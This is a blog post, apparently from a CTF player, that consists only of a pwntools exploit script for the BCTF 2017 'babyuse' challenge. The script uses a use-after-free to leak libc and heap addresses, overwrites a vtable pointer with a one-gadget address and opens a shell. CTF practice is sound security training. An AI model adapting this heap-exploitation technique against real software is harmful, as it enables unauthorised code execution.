BCTF 2017 Babyuse

Pwnable/CTF
BCTF 2017 Babyuse

HSr00t 2017. 12. 1. 13:51
Exploit ONLY
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
from pwn import *
 
p=process("./babyuse")
elf=ELF("./babyuse")
 
def buy(gun,length,name):
    p.recvuntil('Exit')
    p.sendline("1")
    p.recvuntil('95')
    p.sendline(str(gun))
    p.recv(1024)
    p.sendline(str(length))
    p.recvuntil(':')
    p.sendline(name)
 
def select(idx):
    p.recvuntil('Exit')
    p.sendline("2")
    p.recvuntil('gun')
    p.sendline(str(idx))
 
def list():
    p.recvuntil('Exit')
    p.sendline("3")
 
def rename(idx,length,name):
    p.recvuntil('Exit')
    p.sendline("4")
    p.recv(1024)
    p.sendline(str(idx))
    p.recvuntil(':')
    p.sendline(str(length))
    p.recvuntil(':')
    p.sendline(name)
 
def use():
    p.recvuntil('Exit')
    p.sendline("5")
    print p.recvuntil('gun ')
 
def use_input(what):
    p.recvuntil('menu')
    p.sendline(str(what))
 
def drop(idx):
    p.recvuntil('Exit')
    p.sendline("6")
    p.recvuntil('delete:')
    p.sendline(str(idx))
 
buy(2,256,"AAAA")
buy(2,256,"BBBB")
select(0)
drop(0)
use()
main_arena = u32(p.recv(4)) - 0x38
malloc_hook = main_arena - 0x10
libc_base = malloc_hook - 0x1b2768
one_shot = libc_base + 0x3ac69
print hex(main_arena)
print hex(libc_base)
print hex(malloc_hook)
print hex(one_shot)
use_input(4)
buy(2,40,"CCCC") #0
buy(2,40,"DDDD") #2
select(0)
drop(2)
drop(0)
#0,2 off 1 on
use()
heap = u32(p.recv(4))
heap_base = heap - 0x68
heap_vtable = heap_base + 0x250
heap_fake = heap_base + 0x148
use_input(4)
print hex(heap)
print hex(heap_base)
print hex(heap_vtable)
 
buy(1,40,"ZZZZ") #0
buy(1,256,p32(one_shot)) #2
 
select(0)
drop(0)
print "=========="
rename(1,15,p32(heap_vtable)+p32(heap_fake))
 
p.interactive()
cs